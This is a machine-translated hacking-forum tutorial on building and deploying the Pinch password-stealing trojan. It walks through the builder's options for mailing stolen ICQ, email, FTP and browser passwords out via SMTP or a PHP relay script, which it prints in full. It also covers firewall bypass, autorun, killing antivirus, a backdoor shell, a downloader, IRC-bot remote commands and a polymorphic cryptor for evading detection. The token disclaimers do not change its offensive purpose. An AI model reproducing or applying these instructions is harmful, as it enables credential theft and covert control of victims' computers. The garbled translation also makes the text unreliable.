We break the soap, use BrutusAET2


THE MATERIAL IS PUBLISHED FOR FAMILIARIZATION. THE AUTHOR DOES NOT HAVE ANY RESPONSIBILITY


-------------------------------------------------- ----------------
Part 1. old, but useful. For pinch 1

***********************
Instruction for Pinch 1.0
***********************

=====
Intro
=====

Please do not be surprised that I decided to write such an article (article for lamerzzz). The fact is that on my forum (http://forum.web-hack.ru) about once every three days a theme is created, like "How to properly configure and use Pinch?", "How to use Pinch?" etc.

===========
Capabilities
===========

This Trojan has become quite widespread in 2003/2004. All thanks to the ability to steal a large number of passwords (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat !, The Outlook Express Outlook, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp supported)), small weight, open source and easy creation of a troy for a specific task. Troyan has the following options:

- Send the configuration of the victim's computer: OS, operatics, CPU, HDD, logged user, host name, IP
- Keyboard spy (Key-log)
- Remote console
- Bypass Firewall
- Sending all passwords to E-mail using an SMTP server
- Encryption of stolen passwords sent by mail
- Trojan auto-removal after launch
- HTML / Text reports
- File size is approximately 10Kb
- Modular system
- And much more...

Troyan wrote coban2k (http://www.cobans.net) - a pretty famous person in the world of ICQ-hacking. Due to problems with hosting about storing the Trojan on their server, the author was forced to remove this creation from his site. Unfortunately, almost all antiviruses find this triple and it can only be vparit to the victim, who does not have an antivirus.

============
Equipment
============

The following folders and files are included in the archive (pinch_1.0.zip) with the trojan:

\ PinchBuilder.exe - wizard for creating a trojan
\ Parser.exe - program for decrypting encrypted emails with passwords
\ Readme.txt - no comments
\ Pinch \ - the main folder with asm-sources of the Trojan and the compiler
\ Sources \ - other sources
\ TB! 2 Plugin (Auto-parser) \ - folder with a plug-in for The Bat 2 !, which decodes encrypted emails with passwords coming to your mailbox
\ Sources \ Script \ - PHP-script, through which passwords are sent when selecting the appropriate option when compiling (read further)

================
Compile the triple
================

The kit includes a special wizard (PinchBuilder.exe), which is responsible for creating the Trojan for your requirements and compiling the Trojan directly on your computer. The program has two main tabs: Compile and Decrypt. The first one is used to create the Trojan, and the second is used to decrypt passwords (in fact, this tab is the result of the Parser.exe file). Then there are three sub-tabs: SMTP, HTTP and FILE. They are given the option of outputting passwords. Let's analyze each in more detail:

========
SMTP
========

In the Server field, enter the address (hostname / ip) of the SMTP server. If you entered the server domain, then click Resolve to make the server domain look like an IP address. Next, in the From and To fields, specify your own soap. The Send test massage button is used for test mail sending, through the settings you specified. I strongly recommend that you use it. If the letter does not arrive, it means that there are some problems with sending (included firewall, bad SMTP, did not click Resolve, etc.).

I want to note that recently most ISPs switch to a system whereby their customers can send mail ONLY from their SMTP-verver. In such cases, I recommend using the method of sending letters, via HTTP.

====
HTTP
====

We upload the file \ Sources \ Script \ view.php to the server supporting PHP-scripts and executing the mail () function. Next, in the URL field, specify the path to this script (for example, http://www.xss.ru/pinch.php). In the Subject field, specify the name of the topic with which the messages will be recovered. The Status check str field should contain a line, which is output by the script after it is loaded. In the script that comes with the troy it has a value: _ret_ok_1:

<Script language = "JavaScript">
Window.status = "_ ret_ok_1";
</ Script>

If this value is not accepted by the Trojan, it will try to send a message through this script every minute until it receives a string from the Status check str field. I recommend that you use the script not from the standard delivery, but written by me:

<Html> <body>
<? Php
// Author: Terabyte (http://www.web-hack.ru)
$ Email = $ _ POST ['a'];
$ Subject = $ _ POST ['b'];
$ Msg = $ _ POST ['c'];
If (isset ($ email) and isset ($ subject) and isset ($ msg)) {
Mail ($ email, $ subject, $ msg, "From: $ email");}
?>
<Script language = "JavaScript">
Window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>

He does almost the same thing, but is more competently written. A huge advantage when using this method of sending passwords is the fact that it allows you to send passwords bypassing the Firewall. How is this achieved? Here is a clipping from the outpost's log when sending the password through the script from my site:

Process name: iexplorer.exe
Protocol: HTTP
Remote address: www.web-hack.ru

I think everyone understood who is not in the tank =) Also from the pluses I can I can highlight the ability to write encrypted letters on your site, and not send them to soap; The ability to change the soap to which the passwords are sent, in case it is deleted; When mass mailing the troy (so that passwords can be sent even from those providers where access to all SMTP servers except for them is disabled)

====
FILE
====

This tab specifies the path to the file in which all passwords will be saved. To do this, in the Path field, write the path to the file (for example, C: \ password.txt).

================
Compiler Options
================

In this area, everything is clear, then you just have to tick the boxes where you need it. It is necessary to pay attention to the field Add Icon. It indicates the path to the icon from which the compiled trojan will be displayed. I want to note that on my system (Windows XP) I did not manage to compile the trojan with this option enabled and it had to be disabled.

In the Protocol fields, specify the method by which the passwords will be sent (SMTP / HTTP / FILE). Next, click the Compile button and go to compile the Trojan, which will be saved to the main folder with the wizard to create it.

===================
Decrypting passwords
===================

Suppose you managed to vparit lamer this triple and you on the soap came passwords from the victim's car. The matter is that when sending, passwords are encrypted and must first be decrypted (if you do not have a special plug-in to TheBat! Described above). Copy text to the clipboard with encrypted passwords, open Parser.exe (or the Decrypt tab in PinchBuilder.exe) and click the Process Data item in the context menu (or just press Alt + C). Next, the program will give you all the data stolen from the victim with a convenient form. Then you can save or print them.

==========
Conclusion
==========

I want to warn you that when using this Trojan you immediately fall under Article 273 of the Criminal Code of the Russian Federation and can be severely punished ;-) I (the author of the article) do not bear any responsibility for the harm that may be caused to some persons after reading my article.


----------------------------------------

Part 2. instruction for pinch 2.58

A small article on the elementary configuration of the pinch. Do not judge strictly, but criticize in all your mouth. Article on setting up Pinch 2.58.

I think that with crack-ohm problems there is no niukavo, since there is a detailed help and even the video is attached. I want to show you how to set up a three in Builder:

SMTP Properties
Server (enter, in your case smtp.mail.ru), then you necessarily press Resolve so that it is transformed into IP (by the way, all the fraud must be done with the Internet connected)

Port - leave it as it is

Protocol - select how the report will be generated, by SMTP, HTTP (via php) and FILE - saved on the computer. The same buttons (SMTP, HTTP, FILE) configure the protocols, but in this case we are interested in SMTP and we have already configured it.

TestSend button sends a test message to the mail.

The PWD tab - passes passwords from the listed programs. The ENABLE PWD clause will not contain passwords when the daw is removed.
Do not send old report - do not send old reports.
Ducks Encrypt and Packing are interconnected. FSG, UPX, MEW selection of the packing method.

RUN tab - select the methods of autorun. I think you'll sort it out. Populating as .... standart, DLL, Undelate Service. Move to the folder ..... or you specify or choose one of the system ones. On the right, the column Values ​​I did not touch it and to be honest I vaguely imagine why. From the bottom right - bypass Windows Firewall (SP2) - bypass the system firewall in SP2 (as far as I know the mechanism of this item is it starts as iexplorer.exe)

The SPY tab - some additional reports - it did not work for me. Point screen spy - taking screenshots, but again it did not work for me (srkin was sent, but it was empty)

NET tab - I did not use it. It is intended to:
1. Open any port on the infected computer, and accordingly get access to it (strongly I do not use it if you do not encrypt it, if you are caught, you guess what it will be ...)
2. Downloader - specify a direct link to a file that should download and start (estimate what costs your enemy will incur if he has traffic ......))))
3. AutoUpdate - auto update - three, after the work is finished, it downloads its copy, and then it is self-destructed and the next system load, a new copy is launched (this is for reliability so that it can not be found.

The BD (backdoor) tab - the console opens the shell on the selected port, telnet control (telnet.exe) or alternative programs. (I myself have not tried it)

The ECT tab - gluing together with any file, as well as setting the icon ... You can also do that, the message pops up ... But something does not work ...

The KILL tab - killing any process (you can try and kill the antivirus), for example, "spidernt" - and then the DrWEB monitor will turn off (I warn you, I have not given it yet, but I'll try)

IE tab - set your homepage to the browser. Adding a page to Favorites ....

The WORM tab - sho ze tae, I do not ... .....

IRC-bot tab - access to the computer via IRC:
.login authorization
.die - shutting down the bot
.download - jump file from URL
.httpd - open file access via http on a specific port
.killthread - completion of a specific task
.proxy - opening a cos4 with the selected port with the selected id
.raw - sending raw text to this irc server
.remove - deletion
.restart - restart
.run - run commands
.scan - scanning of IP addresses on certain open ports
.shell - opening the shell on a specific port (not in 95/98 / ME)
.status - show version, IP, start date
.threads - show active tasks
.update - self-updating bot from a special URL
.visit - visit selected url hidden
.url - visit the selected URL openly
.link - add to favorits
.sp - make your homepage
.msg - messagebox

That seems to be everything .... You press COMPILE and you have a folder in the folder with the builder ...

GOOD LUCK !!!!!

PS This, like, everything is written for review and the author does not bear any responsibility for the consequences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt features:
Used a polymorphic cryptor
Bypassing KIS and Outpost (including the latest versions)
Self-Removal
Reducing the size (Normal pinch decreases by 3-6kb, zupacha loader by 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~